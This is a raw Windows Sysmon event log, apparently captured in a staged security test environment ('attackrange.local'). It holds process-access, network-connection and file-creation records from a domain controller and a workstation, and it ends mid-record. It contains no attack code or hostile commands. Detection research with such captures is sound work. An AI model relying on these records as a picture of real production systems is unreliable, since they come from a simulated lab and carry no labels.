Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B951EE9D30C035991D5ECBD8D8BAB466,SHA256=3B1151D462DC2B53380DC4291ED012AE0C219D9D2796B43988102B1C7BE4B62B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054818Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:55.152{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054817Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:55.152{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054816Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:55.152{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054815Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:55.152{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054814Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:55.152{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054813Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:55.152{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054812Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:55.152{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054811Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:55.152{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054810Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:55.152{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054809Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:55.152{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054808Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:55.152{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054807Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:55.152{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001054806Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:53.639{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-61828-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001054805Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:52.321{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local50410- 354300x80000000000000001054804Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:52.320{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local61538-false10.0.1.14win-dc-429.attackrange.local53domain 354300x80000000000000001054803Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:52.320{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruea00:10e:0:0:f8c0:7e28:8c9e:ffff-61538-truea00:10e:0:0:0:0:0:0win-dc-429.attackrange.local53domain 354300x80000000000000001054802Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:52.319{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local52767- 354300x80000000000000001054801Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:52.319{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local52767-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domain 354300x80000000000000001054800Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:52.319{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local64873- 23542300x80000000000000001054846Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:56.980{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39505D248F9E9C7ED64C6E1F78CEFA36,SHA256=364EEAFFA50627BEDC29BE49F4A123A729B362EE8A87A365039FFD911F228E6A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980686Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:56.180{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9CBD22546F05BCDB3B86AA676C8F070,SHA256=62B806B2A1D7247998EC6C229203AC8C75C1934087D0A04FC7838AE2073354D4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980689Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:53.992{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-62723-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980688Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:57.648{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E0D8BE8F97227C70285B80243BD0F4D1,SHA256=233A1E72A41D5BFE0A0D700A3C9AA332F77977E29CED114226C8D38583FACB6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980687Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:57.180{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97C03A27C35795F3EE6FB8FEF59691A7,SHA256=908E07DA28A69FD727D7735173462216E5FCAA69D73959B97EB19B69EE151B0B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980692Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:55.947{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-54365-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000980691Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:55.896{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59504-false10.0.1.12-8000- 23542300x8000000000000000980690Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:58.398{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3C2150E704B81DFA7CE704FD0037C6C,SHA256=BABBC9FD19A3965904007A87DF43696B3F1BDF736E1F3A9B5FEE41FB4EDAF962,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054849Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:55.317{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local55184- 354300x80000000000000001054848Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:55.316{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local50048- 23542300x80000000000000001054847Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:58.027{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB0EFDB5DCE54870783B6346A55D3A67,SHA256=B2EC2FA167A2B4B79DF7FDACA25DFC673CD253A3B2B2F66434B9FD8B0576201A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054851Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:57.235{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54187-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001054850Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:59.058{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06D0B59C30E5A0FAF3B1D5B2B7BE3086,SHA256=282AB5AD1401045759698C47B2E6AA7BBE545D934F81E765DD7BE75E81365148,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980693Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:59.523{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=875EE9D5ECCEF5CD1065ED3D649A6F85,SHA256=9015A9AC89E94EDA2896E31D83E90AA55D6EAA64E3D3F14B963444D54E52F122,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054852Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:00.105{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=498385EAED358BA748894EB7AA79680E,SHA256=24ABBC40DB35BCA31083FFA1074EEF91B55A082B267F63B4118CBF438EE17D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980694Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:00.539{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B01D3EF0CA1C1587177E5B5B8C316B14,SHA256=6B23535BDE38E44339C70EDFE6E7406F76A6E2CF836DD6CF69DA85D363FDB607,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054895Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:01.558{5EBD8912-8CFD-6151-7900-00000000FD01}3816NT AUTHORITY\SYSTEMC:\Windows\system32\cmd.exeC:\Windows\Temp\silconfig.logMD5=DF890329D4FEBE7183976DEE3A587486,SHA256=C76451817BD648653983054B0DF034D561216772EC18CAD2CE979CA1BB23DC2E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054894Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:01.511{5EBD8912-8CFD-6151-7A00-00000000FD01}34083960C:\Windows\system32\conhost.exe{5EBD8912-8CFD-6151-7C00-00000000FD01}812C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054893Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:01.511{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054892Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:01.511{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054891Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 